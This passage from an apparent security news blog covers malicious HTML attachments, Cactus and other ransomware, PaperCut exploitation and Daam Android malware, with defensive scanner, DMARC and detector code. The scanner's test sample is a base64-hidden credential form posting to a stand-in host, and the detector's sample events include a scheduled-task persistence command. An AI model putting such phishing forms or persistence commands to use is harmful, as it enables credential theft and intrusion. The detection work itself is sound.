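                result.hits.append(name)
                result.score += weight
        lowered = text.lower()
        if "lure_phrase" not in seen and any(p in lowered for p in LURE_PHRASES):
            seen.add("lure_phrase")
            result.hits.append("lure_phrase")
            result.score += 1
        hidden = decode_base64_blobs(text)
        if hidden:
            result.decoded_layers += 1
            pending.extend(hidden)
    return result


# Constructed samples: a harmless newsletter and a credential form hidden behind atob().
BENIGN_HTML = """<html><body><h1>Monthly newsletter</h1>
<p>Thanks for reading. The full issue is at https://example.invalid/news.</p></body></html>"""

HIDDEN_FORM = """<h2>Sign in to Office 365</h2>
<form method="post" action="https://login.example.invalid/collect">
<input type="email" name="user"><input type="password" name="pwd"><button>Sign in</button></form>"""

PHISHING_HTML = (
    "<html><body><p>Loading your shared document...</p><script>"
    f'document.write(atob("{base64.b64encode(HIDDEN_FORM.encode()).decode()}"));'
    "</script></body></html>"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_HTML), ("phishing", PHISHING_HTML)):
        r = scan_attachment(sample)
        print(f"{label}: {r.verdict} (score {r.score}, hits {r.hits}, decoded layers {r.decoded_layers})")
```

Scoring each indicator once per attachment keeps a single `atob()` call from inflating the result, while decoding the hidden layer is what lets the external-form and password-field rules fire at all; a scanner that looks only at the outer layer sees a harmless "loading" page.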

Because malicious files can damage your device and your organization, taking the necessary precautions has become increasingly important. The following precautions help prevent such attempts: 

Your email infrastructure is crucial here. Antivirus software and firewalls should be kept up to date so that they function properly, and a solid data loss prevention plan must be in place. Defining DMARC for your domain is the most effective way to secure email communications. 

Two-factor authentication is necessary, followed by zero-trust access based on multi-factor authentication. Because such systems evaluate credentials, device, location, time zone, and access history, they limit breaches and protect employees even when they fall victim to hacker attacks, credential theft, and phishing. 

Employee training on recognizing and reporting malicious HTML attachments must be given its due weight. Employees must learn to recognize and report attachments from unknown sources, especially those that may carry malware; if such threats are not prevented, the consequences for an organization can be serious.
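The DMARC step above is easy to get half right: a record with `p=none` is published but enforces nothing. As an added example, not from the article, the checker below parses a `_dmarc` TXT record and reports the settings that leave the domain spoofable (monitor-only policy, partial `pct`, unprotected subdomains, no aggregate-report address). The two records are constructed for the illustration; in practice you would paste in the TXT record returned for `_dmarc.<yourdomain>`.

```python
from typing import Dict, List

# Constructed records for the example; replace with the TXT record from _dmarc.<yourdomain>.
WEAK_RECORD = "v=DMARC1; p=none; pct=50"
STRONG_RECORD = "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc-reports@example.com"


def parse_dmarc(record: str) -> Dict[str, str]:
    """Split a DMARC TXT record into its tag=value pairs (tag names are case-insensitive)."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> List[str]:
    """Return a list of weaknesses; an empty list means the record enforces a strict policy."""
    findings: List[str] = []
    tags = parse_dmarc(record)

    if tags.get("v") != "DMARC1":
        findings.append("record must start with v=DMARC1")

    policy = tags.get("p")
    if policy is None:
        findings.append("no p= tag: receivers will ignore the record")
    elif policy == "none":
        findings.append("p=none only monitors; spoofed mail from this domain is still delivered")
    elif policy == "quarantine":
        findings.append("p=quarantine: move to p=reject once aggregate reports show no legitimate failures")
    elif policy != "reject":
        findings.append(f"unknown policy p={policy}")

    # sp= defaults to the organizational policy when absent.
    subdomain_policy = tags.get("sp", policy)
    if subdomain_policy == "none" and policy not in (None, "none"):
        findings.append("sp=none leaves subdomains spoofable even though the organizational domain is protected")

    pct = tags.get("pct", "100")
    if pct != "100":
        findings.append(f"pct={pct}: the policy is applied to only {pct}% of failing messages")

    rua = tags.get("rua")
    if not rua:
        findings.append("no rua= address: you will receive no aggregate reports on who is sending as your domain")
    elif not all(uri.strip().startswith("mailto:") for uri in rua.split(",")):
        findings.append("rua= entries must be mailto: URIs")
    return findings


if __name__ == "__main__":
    for label, rec in (("weak", WEAK_RECORD), ("strong", STRONG_RECORD)):
        print(label, rec)
        for finding in assess_dmarc(rec) or ["no weaknesses found"]:
            print("  -", finding)
```

Run it against the weak record and it reports three problems; the strong record comes back clean. The `pct` check matters more than it looks: a partial rollout left in place for months means a predictable share of spoofed mail is always delivered.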

Obfuscation is certainly the common denominator among all the spammed HTML attachments in this case, which demonstrates just how difficult a threat like this is to detect at the email gateway layer.

Cactus: New Ransomware Encrypts Itself to Evade Detection


Cactus, a newly discovered ransomware operation, has apparently been exploiting vulnerabilities in VPN appliances to gain initial access to the networks of "large commercial entities."

Although the new threat actor uses the file encryption and data theft techniques typical of ransomware attacks, it encrypts itself to evade antivirus detection, which makes it exceptionally hard to eliminate.

Encrypted Configuration Twist

According to the cybersecurity experts at Kroll, the Cactus ransomware infiltrates its victims' networks by exploiting security flaws in VPN appliances. The researchers discovered that the hackers used compromised service accounts to access these networks through VPN servers.

Cactus's self-encryption is what sets it apart. To achieve it, the operators use a batch script and the popular compression tool 7-Zip to obtain the encryptor binary: once the binary is extracted, the original ZIP archive is deleted and the binary is executed with a specific parameter, which makes it hard for antivirus software to identify the threat.

Kroll investigators further explain that the script is run using three separate switches: -s for initialization, -r for loading a configuration file, and -i for encryption.

Once within the targeted network, the attackers employ an SSH backdoor along with scheduled tasks to maintain their presence while conducting a number of reconnaissance operations, such as pinging remote hosts, identifying endpoints, and locating user accounts.

To maximize damage, the Cactus ransomware runs a batch script that disables common antivirus software. The attackers exfiltrate files from infected machines to a cloud server before automatically encrypting them with a PowerShell script.
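The deployment chain Kroll describes (7-Zip extracts the binary, the archive is removed, the binary runs with `-s`, `-r <config>` or `-i`, and scheduled tasks keep it alive) is visible in ordinary process-creation telemetry. As an added example, not from the article or from Kroll, the detector below groups constructed process events by parent, looks for an extraction followed by a launch of a binary from the extraction directory with one of the three switches, and separately flags `schtasks /create`. The event records, paths and file names are all constructed for the illustration and are not Cactus indicators from the page.

```python
import ntpath
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (fields modelled on Sysmon event 1 / EDR telemetry)."""
    ts: int
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Alert:
    pid: int
    rule: str
    detail: str


ARCHIVERS = {"7z.exe", "7za.exe", "7zg.exe"}
ENCRYPTOR_SWITCHES = {"-s", "-r", "-i"}  # the three switches Kroll describes


def _output_dir(argv: List[str]) -> Optional[str]:
    """7-Zip writes extracted files to the directory given by -o<dir>."""
    for arg in argv:
        if arg.lower().startswith("-o") and len(arg) > 2:
            return arg[2:].rstrip("\\").lower()
    return None


def detect_cactus_chain(events: List[ProcEvent]) -> List[Alert]:
    """Flag an extracted binary launched with the encryptor switches, plus
    scheduled-task creation as a (lower-fidelity) persistence indicator."""
    alerts: List[Alert] = []
    children = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        children[ev.ppid].append(ev)

    for siblings in children.values():
        extract_dir: Optional[str] = None
        extract_ts = 0
        for ev in siblings:
            name = ntpath.basename(ev.image).lower()
            argv = ev.cmdline.split()
            # Step 1: a 7-Zip extract ("x" or "e") run by this parent.
            if name in ARCHIVERS and len(argv) > 1 and argv[1].lower() in ("x", "e"):
                extract_dir = _output_dir(argv)
                extract_ts = ev.ts
                continue
            # Step 2: something from that directory is launched with -s / -r / -i afterwards.
            if extract_dir and ev.ts > extract_ts and ev.image.lower().startswith(extract_dir):
                used = ENCRYPTOR_SWITCHES & {a.lower() for a in argv[1:]}
                if used:
                    alerts.append(Alert(ev.pid, "extracted binary run with encryptor switch "
                                        + "/".join(sorted(used)), ev.cmdline))
            # Persistence: scheduled task creation anywhere in the tree.
            if name == "schtasks.exe" and "/create" in ev.cmdline.lower():
                alerts.append(Alert(ev.pid, "scheduled task created for persistence", ev.cmdline))
    return alerts


SAMPLE_EVENTS = [
    # Constructed: a batch script host (pid 100) extracts an archive and runs the payload.
    ProcEvent(1, 100, 50, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\ProgramData\update\run.bat"),
    ProcEvent(2, 101, 100, r"C:\Program Files\7-Zip\7z.exe", r"7z.exe x C:\ProgramData\update.zip -oC:\ProgramData\update"),
    ProcEvent(3, 102, 100, r"C:\ProgramData\update\svc.exe", r"svc.exe -s"),
    ProcEvent(4, 103, 100, r"C:\ProgramData\update\svc.exe", r"svc.exe -r C:\ProgramData\update\config.bin"),
    ProcEvent(5, 104, 100, r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /create /tn Updater /tr C:\ProgramData\update\svc.exe -i /sc onlogon"),
    # Constructed benign noise: a user unpacking a backup, and a git commit that also uses -s.
    ProcEvent(6, 201, 60, r"C:\Program Files\7-Zip\7z.exe", r"7z.exe x D:\backup.zip -oD:\restore"),
    ProcEvent(7, 301, 70, r"C:\Program Files\Git\cmd\git.exe", r"git.exe commit -s -m fix"),
]

if __name__ == "__main__":
    for alert in detect_cactus_chain(SAMPLE_EVENTS):
        print(f"pid {alert.pid}: {alert.rule}: {alert.detail}")
```

Requiring the launched image to come from the 7-Zip output directory is what keeps the `git commit -s` event quiet: a bare "-s on the command line" rule would page on half the developer workstations in the estate.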

While detailed information about the Cactus operation, the victims it targets, and whether the attackers honor their promise to provide a working decryptor when paid is not yet available, applying the latest vendor software updates, watching for large data exfiltration attempts, and acting quickly should guard against the most destructive, final stages of a ransomware attack.


Constellation Software Cyberattack Claimed by ALPHV

 


The ALPHV/BlackCat ransomware group claims to have compromised Constellation Software's network in a cyberattack, according to a recent posting on the gang's leak site. Essen Medical Associates and the Canadian software company were both listed as victims. 

Constellation Software Inc., a Toronto-based company, stated that on Wednesday it had been affected by a cybersecurity incident that impacted only one of its IT infrastructure systems. 

Some limited personal information was affected by the incident, and a limited number of business partners of Constellation's businesses were also impacted. Constellation's operating groups and businesses, rather than the parent company, will contact these individuals and partners directly.  

Those whose data was compromised and the affected business associates have also been contacted with further information. 

A small number of individuals had their private information compromised in the incident, and some of the data belonged to a small number of business partners of the various Constellation businesses that were potentially affected. 

Constellation Software is composed of six divisions dedicated to acquiring, managing, and growing software companies: Volaris, Harris, Jonas, Vela Software, Perseus Group, and Topicus. 

The Canadian company has a global presence, employing over 25,000 people in North America, Europe, Australia, South America, and Africa and generating $4 billion in revenue every year. It has acquired more than 500 software companies since 1995 and serves more than 125,000 customers in more than 100 countries. 

According to Constellation, the incident involved a small number of systems used for internal financial reporting and related data storage, which Constellation's operating groups and businesses are required to use. The autonomous IT systems of those operating groups and businesses were not impacted, and the company's business operations have not been adversely affected by the incident. 

ALPHV/BlackCat's leak site lists the attachments the ransomware group gathered from the two breaches. 

Twenty-four attachments were listed for the Essen Medical Associates cyberattack and 25 for the Constellation Software cyberattack.   

Statement from the company regarding the cyberattack on Constellation Software 

Shortly after Constellation Software announced the cyberattack, the ALPHV/BlackCat leak site post appeared; the company's press release confirmed that on April 3 a limited number of its IT systems had been compromised in a cyber incident. 

The affected financial reporting and data storage systems are used by only a few of the organization's operating groups and businesses, which rely on them for internal financial reporting.   

The independent IT systems of Constellation's operating groups and businesses were not impacted by this incident in any way, and according to the press release Constellation's business operations have not been affected.   

ALPHV has already leaked documents containing business information online to prove that it accessed and exfiltrated files from Constellation's network.  

The ALPHV operation launched in November 2021 and is believed to be a rebrand of the DarkSide/BlackMatter gang. The group first became known as DarkSide when it attacked the Colonial Pipeline and immediately found itself in the crosshairs of international law enforcement. 

The gang shut down, rebranded itself as BlackMatter one month later in July 2021, and was forced to shut down again in November after its servers were seized and Emsisoft released a decryptor that exploits a weakness in the ransomware's encryption algorithm.   

ALPHV is now widely regarded as one of the biggest ransomware threats to corporations around the globe. The FBI also singled the group out in April, after it had hacked over 60 companies between November 2021 and March 2022 as part of its ransomware operation. According to the FBI, ALPHV has "extensive networks and extensive experience with ransomware operations."

Mobile Menace: McAfee's 2023 Report on the Top Mobile Threats

Mobile Data Security: Insights from McAfee's 2023 Consumer Mobile Threat Report

Mobile devices are an essential part of our lives today. From staying connected with our loved ones to handling our finances and work-related tasks, smartphones have become indispensable. However, this convenience comes with a price. 

As our dependence on mobile devices increases, so do the risks associated with mobile data security. In this blog post, we will explore some insights from McAfee's 2023 Consumer Mobile Threat Report and discuss how we can protect our mobile data.

According to the report, cybercriminals are getting more sophisticated in their approach toward mobile threats. They are using advanced techniques such as ransomware, malware, and phishing attacks to target mobile devices. 

One of the primary reasons behind the rise in mobile malware is the increase in app usage. Malicious apps often masquerade as legitimate ones, making it challenging to identify them. Once they gain access to your device, they can steal your personal information or lock your device, demanding a ransom payment. Another alarming trend highlighted by the report is the rise of phishing attacks. 

Cybercriminals are using social engineering techniques to trick users into providing their login credentials, credit card details, or other sensitive information. They do this by creating fake login pages that look identical to the original ones. Once you enter your details, criminals can use them to gain unauthorized access to your accounts.

McAfee's report suggests the following:

Stay safe from malicious apps

Millions of apps are available on the App Store and Google Play Store, but some of them may contain malware, which can provide hackers access to your device's data once downloaded. 

McAfee's Mobile Threat Report advises that users should be particularly cautious when downloading image editors and photography apps, business and phone utility apps, gaming tips and cheats, and social media tools. 

Users should also be wary of fake ChatGPT apps or those that claim to be powered by GPT-4. Additionally, users should be cautious of apps that charge excessively, which could be a red flag, as ChatGPT, Google's Bard, and Microsoft's Bing are all free to use on the web.

If an app has infected your device with malware, there may be some indicators such as increased mobile data consumption, rapid battery drain, subscriptions that you did not knowingly sign up for, or unfamiliar apps on your home screen. 

The report suggests running a virus scan with a trusted security app, restarting your device, deleting any suspicious software, or performing a factory reset as a last resort if your phone has been infected with malware.

Stay away from scammers

You should be cautious of scammers who may reach out to you through various means such as email, text, or social media direct messages. In the past, scams could be identified by incorrect grammar, spelling, or syntax in their messages. 

The report suggests scammers are now leveraging AI tools like ChatGPT to produce convincing and accurate scams without grammatical errors. This means that users need to conduct more thorough investigations to determine whether they are being scammed.

When trying to identify a scam, it's essential to look for certain indicators. Scammers often try to make you act urgently, contact you from unfamiliar numbers or names, and pressure you to provide personal information. You should remain vigilant and cautious when receiving unexpected messages or requests for information.

Keep a watch over kids

The risk of malware is not limited to work-related apps, such as productivity tools or photo editors. According to McAfee, malicious apps can also be disguised as apps aimed at children. These apps can be promoted on popular social media platforms like Instagram, TikTok, and YouTube and often target children by advertising cheats or gaming mods for games like Minecraft and Roblox. 

As children do not possess the same level of critical thinking skills as adults, it is essential to help your children keep their devices safe.

To safeguard your child's device, McAfee recommends setting clear boundaries on app downloads and ensuring that your child consults with you before downloading any apps so that you can verify their legitimacy. Additionally, you should lock your child's device to prevent them from entering any payment information into malicious apps. 

It's also important to keep track of any in-app purchases your child wishes to make, as these can be for game add-ons, character skins, or upgrades, which can be expensive. As these apps target children, your child may be misled into using your money to make costly purchases.

The Ransomware Gang Targets University Alert Systems

 


"RamAlert," an emergency broadcast system used by Bluefield University to communicate with its students and staff, has been hijacked by the Avos ransomware gang, which sent SMS texts and emails informing recipients that their data had been stolen and was about to be released. Bluefield is a private university with more than 900 students and a small campus in Bluefield, Virginia.

In a recent announcement, the Virginia university advised students to be cautious of texts received via the school's mass alert system, after the ransomware group used it to tell the entire campus that a cyberattack was under way. 

It was announced on Sunday that Bluefield University, a private Baptist school in Bluefield, Virginia, that serves approximately 1,000 students, had shut down its systems following the cyberattack and that they would remain down for an unknown period. 

According to the messages posted through Bluefield University's RamAlert, an app that sends text and email messages to students and faculty during emergencies, the hackers sent a series of messages urging recipients to go to the university's president and state their concerns. 

Students and faculty members of Bluefield University were informed of a cyberattack that took place on April 30 and affected the university's IT systems and personal information. Faculty and staff had access to most university apps and websites before the incident, and no evidence of identity theft or financial fraud had been reported to the University at that time. 

On May 1 the Avos ransomware gang hijacked RamAlert, the university's emergency broadcast system, and used it to inform students and faculty by text and email that data had been stolen.  

Bluefield University filed a police report on Tuesday alleging that a ransomware group had used the RamAlert system used by the university to send threatening messages to all students and staff members.

The ransomware group threatened to continue disrupting the university if its president refused to pay the ransom demanded. 

Brett Callow shared the news on Twitter, revealing that, according to a message sent to Bluefield's student body and staff, the hackers hold approximately 1.2 TB of Bluefield's data. The hackers also emailed Bluefield's president telling him to pay the full ransom, and instructed students and staff to pressure him to do so.  

In addition, the final message from the Avos ransomware gang, also known as AvosLocker, implored recipients to share the information with news outlets, claiming this would keep their data from being exposed on the dark web. A further message read, "Call President David Olive and tell him to pay us as soon as possible otherwise, prepare for attacks." 

It is worth remembering, however, that the group's goal is to leak samples of stolen data, and the message also provides a link where the stolen data can be found. 

The school issued an announcement on Tuesday acknowledging that the RamAlert system had been hacked and warning students not to click on any links or emails sent by the hackers. 

Because of the sudden disruption, the school could not hold final exams on Monday; they were pushed back a day and held on Tuesday, Wednesday, and Thursday instead. School systems, including email, remain unavailable at this time. 

Bluefield school officials have emailed all students and staff advising them not to open or forward any of the links sent to their school accounts. Several of the school's systems remained unavailable until a couple of days before the university's final exams in May. 

According to a university spokesperson, it is not clear whether the university will consider paying the hackers.   

From double extortion to triple extortion, ransomware groups have used a variety of methods to raise the stakes for their victims: emailing the victim's customers, calling its partners, contacting its competitors, and setting up searchable portals that let anyone discover the leaked data. 

Bluefield University was attacked by the ransomware gang known as AvosLocker, which operates on Russian-speaking underground forums. On such forums a user called "Avos" has regularly been seen recruiting hackers, many of whom end up working for the operation. 

The group's leak site lists victims from around the world attacked over several years. The US Federal Bureau of Investigation has published an advisory on the AvosLocker threat that includes details of how the group has operated and recommendations for mitigating its attacks.

Cryptocurrency Exchanges Linked to Ransomware

 


In a daring joint operation, the FBI and the Ukrainian police have taken down nine cryptocurrency exchange websites that cybercriminals and ransomware gangs used to launder money. Ukrainian prosecutors' offices and the Virtual Currency Response Team were also involved in the operation. 

On Monday the FBI seized several virtual currency exchange services that cybercriminals may have used to launder the proceeds of ransomware attacks. The US Department of Justice announced that the FBI's Detroit Field Office, working with Ukrainian police, seized the exchanges, which criminals used for anonymous transactions. 

A press release states that the FBI also received support from the Virtual Currency Response Team (VCRT), the National Police of Ukraine, and regional prosecutors in the 'crypto exchanges' operation. The seized domains were: 

  1. 24xbtc.com 
  2. 100btc.pro 
  3. pridechange.com 
  4. 101crypta.com 
  5. uxbtc.com 
  6. trust-exchange.org 
  7. bitcoin24.exchange 
  8. paybtc.pro 
  9. owl.gold 

These websites let users anonymously buy Bitcoin, Ether, and other cryptocurrencies. They offered Russian- and English-language exchange services with few Know Your Customer (KYC) or Anti-Money Laundering (AML) restrictions and were advertised on online forums dedicated to criminal activity. 

The exchange servers have been shut down and their domain names taken over by US authorities. The exchanges were accused of offering anonymous cryptocurrency exchange services to visitors, including cybercriminals, scammers, and many other bad actors. 

The FBI accused the exchanges of being used by cybercriminals, including scammers, ransomware operators, and hackers, to launder money, and stated that they were unlicensed, which under US law amounts to support for criminal activity. 

Two servers were confiscated; the infrastructure was spread across several countries, including the US, Ukraine, and several European countries. Cybercriminals used the exchanges to launder the proceeds of illegal activity, and the authorities are now using the seized infrastructure to identify and track down those hackers.

Both the English- and Russian-language exchanges offered similar services, and the FBI censured them for lacking anti-money laundering measures and for collecting little or no Know Your Customer information. The FBI says such unlicensed, rogue exchanges are among the most critical hubs of the cybercrime ecosystem. 

The seized sites let users anonymously convert their cryptocurrency into coins that are harder to trace, allowing hackers to disguise the source of stolen funds and avoid detection by law enforcement.

The sites offered a range of services, including live help and instructions in both Russian and English, and catered to a wide range of cybercrime communities. 

The FBI's announcement says that noncompliant virtual currency exchanges operating in violation of United States Code Sections 1960 and 1956 serve as hubs for cybercrime: they have lax anti-money laundering programs and collect little information about their customers.

Earlier this month, a search was conducted at the home of former FTX executive Ryan Salame as part of the FBI's investigation into his role as an advisor to Bankman-Fried. 

In the operation, the FBI and Ukrainian police took down nine websites known as 'crypto exchanges' that were well known for laundering money for ransomware groups and cybercriminals. The action was a deliberate campaign to disrupt the digital infrastructure that lets these criminals profit from their malicious activity. 


Ransomware Clop and LockBit Attacked PaperCut Servers

 


A Microsoft spokesperson stated that recent attacks exploiting two vulnerabilities in the PaperCut print management software are likely associated with an affiliate of the Clop ransomware operation. 

PaperCut Application Server was updated last month to fix two vulnerabilities that could allow remote attackers to execute code without authentication and to access information.

CVE-2023-27350 / ZDI-CAN-18987 / PO-1216: This vulnerability affects PaperCut MF/NG versions 8.0 or later on all OS platforms, impacting both the application server and the site server. 

CVE-2023-27351 / ZDI-CAN-19226 / PO-1219: This vulnerability affects PaperCut MF/NG versions 15.0 or later on all application server platforms and allows unauthenticated information disclosure.

Last week, after Trend Micro notified PaperCut that a vulnerability was being exploited in the wild, PaperCut sent an alert to users: customer servers must be updated as soon as possible.

“Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” a tweet by Microsoft Threat Intelligence reads.  

Last week, Microsoft Threat Intelligence identified "Lace Tempest" as one of the threat actors exploiting these bugs, noting its overlaps with FIN11 and TA505. 

FIN11, a group involved in the Accellion FTA extortion campaign, is linked to the infamous Clop ransomware gang. TA505 is reportedly linked to the Dridex malware and was responsible for Locky. 

Fortra's GoAnywhere file-sharing software has previously been exploited in ransomware campaigns associated with the same Clop affiliate, which has also used the widely distributed Raspberry Robin worm for post-compromise activity.

The flaws affect both PaperCut NG and PaperCut MF. CVE-2023-27350 allows an unauthenticated attacker to execute code remotely on a PaperCut Application Server, while CVE-2023-27351 allows an unauthenticated attacker to steal information about users stored in PaperCut MF or NG, such as usernames, full names, email addresses, department information, and credit card numbers.

Attackers exploiting this vulnerability can also retrieve hashed passwords for internal PaperCut-created accounts, although they cannot access password hashes for users synced from external directory sources such as Microsoft 365 and Google Workspace. 

Earlier reports indicated that Lace Tempest, also tracked as DEV-0950, is a Clop affiliate; it has been seen using GoAnywhere exploits and Raspberry Robin malware in ransomware campaigns. PaperCut servers have been targeted through these vulnerabilities since April 13. 

A Familiar Clop Pattern

The exploitation of PaperCut servers fits the pattern seen from the Clop ransomware gang over the last three years. 

Although the Clop operation still encrypts files in its attacks, BleepingComputer has reported that it prefers to steal data from victims and use it to extort them for ransom. 

In 2020, Clop exploited a zero-day vulnerability in Accellion's FTA and stole data from approximately 100 companies, marking this shift in tactics.

More recently, the Clop gang exploited a zero-day vulnerability in the GoAnywhere MFT secure file-sharing platform to steal data from 130 companies.

DDoS is Emerging as the Most Important Business Concern for Edge Networks

 

Businesses are particularly concerned about distributed denial-of-service (DDoS) attacks, which they believe will have the most impact on their operations. That was one of the key conclusions of AT&T's "2023 Cybersecurity Insights Report," based on a poll of 1,418 people. Theresa Lanowitz, head of cybersecurity evangelism at AT&T Business, describes the perceived risk and surge in concern about DDoS attacks as "surprising."

She adds, "With edge, the attack surface is changing, and taking down a large number of Internet of Things (IoT) devices can have a significant impact on the business. The near real-time data created and consumed by most edge use cases make DDoS attacks attractive. By its definition, a DDoS attack will degrade a network and response time. Those who have not invested in DDoS protection are indicating the timing is right to do so."

According to the report, ransomware dropped to eighth place out of eight in terms of perceived likelihood of attack type. Nonetheless, Lanowitz observes that over the last 24 months, organizations of all sizes have invested in ransomware prevention.

"However, ransomware criminals and their attacks are relentless," she warns. 

According to other research, cyber adversaries may cycle through different sorts of attacks as those attacks rise and decline. The embedded operating systems in edge IoT devices make it more expensive for a financially motivated adversary to target such a device with ransomware, Lanowitz explains.  

She further noted, "It is far more time intensive to write and deploy destructive code for an IoT device running a derivative of a version of Linux than to target a Windows-based laptop."

One of the most pleasantly surprising results in the report, she says, is how organizations are investing in security for an edge: security funds have grown to 22% of overall project costs, allocated evenly with strategy.

"We asked survey participants how they were allocating their budgets for primary edge use cases. The results show that security is clearly an integral part of the edge, and that security is being planned for proactively," she explained.

She cited survey results indicating that apps, as well as much-needed security for ephemeral edge applications, are included in the overall plan for edge project funding. The expected outcome of what the edge delivers is shifting how organizations budget, plan, and think about focusing on a digital-first business, Lanowitz continues.

Another surprising finding from the survey is that globally, the likelihood of a compromise and impact to the business decreased by 28% and 26%, respectively.

She added, "Perhaps this is a case of irrational exuberance, but our qualitative analysis proves that with the edge there is far more communication and collaboration. Communication, cross-functional work, the line of business leading edge investments, and the use of trusted advisors all play a role in more optimism regarding catastrophic security events."

"Edge computing, with its changing attack surface, means the adversaries are seeing things differently," Lanowitz says. "Likewise, businesses must take that same view of an expanded attack surface, potential new threats, or potential increases in existing threats."

The report comes as DDoS attacks continue to make headlines, with the German government reporting that Killnet DDoS attacks temporarily knocked German websites offline, and the Serbian government reporting that it prevented five attempts aimed at destroying Serbian infrastructure.

KillNet, a pro-Russian hacktivist group that runs campaigns against countries supporting Ukraine, has recently increased its daily DDoS attacks on healthcare organizations. In November 2022, over 50 of the most popular DDoS-for-hire platforms used to attack important Internet infrastructure were shut down and their operators arrested as part of Operation Power Off, a large multinational law enforcement sweep.

Beware of This Dangerous Android Malware, as It Can Hold Your Phone Hostage

 

A brand-new Android malware discovered in the wild can evade antivirus apps, steal a tonne of private and financial information, and even encrypt all of the contents of an infected smartphone as ransomware. 

According to a recent report from the cybersecurity company CloudSEK, this new Android malware, which its researchers call "Daam", poses a serious threat even to the best Android phones because of its advanced capabilities.

So far, CloudSEK has found the Daam malware in the APK (Android app installation) files for the Psiphon, Boulders, and Currency Pro apps, which appear to be sideloaded apps that the Daam malware uses to infect Android smartphones. Psiphon is a VPN programme; Boulders is a smartphone game; and Currency Pro is, as its name implies, a currency converter.

Your Android phone may be infected with the Daam malware if you installed any of these apps by sideloading rather than through an approved app store such as the Google Play Store. Because the malware can evade detection by antivirus software, and may already have encrypted the files on your smartphone, there may be no simple remedy.

File encryption 

The Daam malware is quite complex and has a variety of features intended to steal your data and jeopardise your privacy. For instance, it is capable of recording all active VoIP and phone calls, including WhatsApp calls. It can also steal your smartphone's files and even your contacts. Notably, the Daam malware collects not only your existing contacts but also any contacts added after infection.

All of the data Daam steals is sent back to a command and control (C&C) server operated by the hackers behind this campaign. It is important to note that, once installed, the malicious apps used to spread the malware request sensitive device permissions, giving them near-total control of your Android smartphone.

As if having all of this private information stolen wasn't bad enough, the Daam malware also encrypts all of the files on an infected Android smartphone using the AES encryption algorithm, without the user's consent. At the same time it can change the device password or PIN, locking you out entirely.

Mitigation tips

Normally, protecting yourself from mobile malware would only require installing one of the top Android antivirus programmes and turning on Google Play Protect on your phone. 

In this instance, though, the Daam malware was built to evade antivirus apps. Because of this, the best way to protect yourself is to be extra cautious when installing new apps. Although sideloading apps may be convenient, it puts your Android smartphone at risk of being infected with malware, so you should only download apps from official Android app stores. Likewise, you should still read reviews and check an app's rating before installing it, because malicious apps occasionally manage to get past Google's security checks.

At the same time, you should refrain from clicking any links sent to your smartphone by email or text message from unknown senders. These links may lead to malicious websites that could trick you into installing malware or use phishing to harvest your information.

Although the Daam malware is relatively new, it is already quite capable of stealing data and making life difficult for Android smartphone owners. Because of this, we will probably continue to hear about it.